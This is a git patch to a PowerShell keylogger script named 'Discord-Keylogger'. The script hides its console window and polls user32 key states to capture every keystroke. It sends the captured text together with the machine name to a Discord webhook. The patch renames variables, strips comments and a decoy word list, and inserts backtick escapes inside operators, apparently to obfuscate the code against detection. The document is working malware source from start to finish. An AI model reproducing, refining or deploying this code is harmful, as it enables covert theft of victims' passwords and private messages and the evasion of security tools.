From d229600957fa787fa5b158f42d3fce964d477554 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Fri, 20 Jun 2025 10:33:14 +0000 Subject: [PATCH] Update main.ps1 --- Discord-Keylogger/main.ps1 | 118 ++++++++++++------------------------- 1 file changed, 38 insertions(+), 80 deletions(-) diff --git a/Discord-Keylogger/main.ps1 b/Discord-Keylogger/main.ps1 index 8d83efd..9678d1e 100644 --- a/Discord-Keylogger/main.ps1 +++ b/Discord-Keylogger/main.ps1 @@ -4,6 +4,21 @@ if ($dc.Length -lt 120){ $dc = ("https://discord.com/api/webhooks/" + "$dc") } +$defs = @' +[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] +public static extern short GetAsyncKeyState(int virtualKeyCode); +[DllImport("user32.dll", CharSet=CharSet.Auto)] +public static extern int GetKeyboardState(byte[] keystate); +[DllImport("user32.dll", CharSet=CharSet.Auto)] +public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); +[DllImport("user32.dll", CharSet=CharSet.Auto)] +public static extern int MapVirtualKey(uint uCode, int uMapType); +'@ +$defs = Add-Type -MemberDefinition $defs -Name 'Win32' -Namespace API -PassThru + +$lastpress = [System.Diagnostics.Stopwatch]::StartNew() +$threshold = [TimeSpan]::FromSeconds(10) + $Async = '[DllImport("user32.dll")] public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);' $Type = Add-Type -MemberDefinition $Async -name Win32ShowWindowAsync -namespace Win32Functions -PassThru $hwnd = (Get-Process -PID $pid).MainWindowHandle @@ -17,101 +32,44 @@ else{ $Type::ShowWindowAsync($hwnd, 0) } -<# -Ablaze – On fire; brightly burning with intensity. - -Banter – Playful, teasing talk between close friends. - -Crisp – Firm, dry, and easily breakable texture. - -Dapper – Stylish, neat man with elegant appearance. - -Elicit – Draw out a response or reaction. - -Fathom – Understand something deeply, often abstractly. - -Glimpse – Quick, brief look without full details. - -Havoc – Widespread destruction; total chaos and disorder. - -Imbue – Fill or inspire with certain feelings. - -Jovial – Cheerful, friendly, full of good humor. - -Keen – Sharp, eager, or intellectually perceptive mind. - -Lurk – Remain hidden, waiting to spring forth. - -Mirth – Amusement expressed through laughter or cheerfulness. - -Nimble – Quick and light in movement or action. - -#> - -$defs = @' -[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] -public static extern short GetAsyncKeyState(int virtualKeyCode); -[DllImport("user32.dll", CharSet=CharSet.Auto)] -public static extern int GetKeyboardState(byte[] keystate); -[DllImport("user32.dll", CharSet=CharSet.Auto)] -public static extern int MapVirtualKey(uint uCode, int uMapType); -[DllImport("user32.dll", CharSet=CharSet.Auto)] -public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); -'@ -$defs = Add-Type -MemberDefinition $defs -Name 'Win32' -Namespace API -PassThru - -$LastKeypressTime = [System.Diagnostics.Stopwatch]::StartNew() -$KeypressThreshold = [TimeSpan]::FromSeconds(10) While ($true){ - $keyPressed = $false + $ispressed = $false try{ - while ($LastKeypressTime.Elapsed -lt $KeypressThreshold) { - # Start the loop with 30 ms delay between keystate check - Start-Sleep -Milliseconds 30 - for ($asc = 8; $asc -le 254; $asc++){ - # Get the key state. (is any key currently pressed) - $keyst = $defs::GetAsyncKeyState($asc) - # If a key is pressed - if ($keyst -eq -32767) { - # Restart the inactivity timer - $keyPressed = $true - $LastKeypressTime.Restart() - $null = [console]::CapsLock - # Translate the keycode to a letter - $vtkey = $defs::MapVirtualKey($asc, 3) - # Get the keyboard state and create stringbuilder - $kbst = New-Object Byte[] 256 - $checkkbst = $defs::GetKeyboardState($kbst) - $logchar = New-Object -TypeName System.Text.StringBuilder - # Define the key that was pressed - if ($defs::ToUnicode($asc, $vtkey, $kbst, $logchar, $logchar.Capacity, 0)) { - # Check for non-character keys - $LString = $logchar.ToString() - if ($asc -eq 8) {$LString = "[BACK]"} - if ($asc -eq 13) {$LString = "[ENT]"} - if ($asc -eq 27) {$LString = "[ESC]"} - # Add the key to sending variable - $send += $LString + while ($lastpress.Elapsed` -lt $threshold) { + Sleep -M 30 + for ($character = 8; $character` -le 254; $character++){ + $keyst = $defs::GetAsyncKeyState($character) + if ($keyst -eq` -32767) { + $ispressed = $true + $lastpress.Restart() + $null = [console]::CapsLock + $virtual = $defs::MapVirtualKey($character, 3) + $state = New-Object Byte[] 256 + $check = $defs::GetKeyboardState($state) + $logged = New-Object -TypeName System.Text.StringBuilder + if ($defs::ToUnicode($character, $virtual, $state, $logged, $logged.Capacity, 0)) { + $thestring = $logged.ToString() + if ($character` -eq` 13) {$thestring` = "[ENT]"} + if ($character` -eq` 8) {$thestring` = "[BACK]"} + if ($character` -eq` 27) {$thestring` = "[ESC]"} + $send += $thestring } } } } } finally{ - If ($keyPressed) { - # Send the saved keys to a webhook + If ($ispressed) { $escmsgsys = $send -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} $timestamp = Get-Date -Format "dd-MM-yyyy HH:mm:ss" $escmsg = $timestamp+" : "+'`'+$escmsgsys+'`' $jsonsys = @{"username" = "$env:COMPUTERNAME" ;"content" = $escmsg} | ConvertTo-Json Invoke-RestMethod -Uri $dc -Method Post -ContentType "application/json" -Body $jsonsys - #Remove log file and reset inactivity check $send = "" - $keyPressed = $false + $ispressed = $false } } - # reset stopwatch before restarting the loop - $LastKeypressTime.Restart() - Start-Sleep -Milliseconds 10 + $lastpress.Restart() + Sleep -M 10 }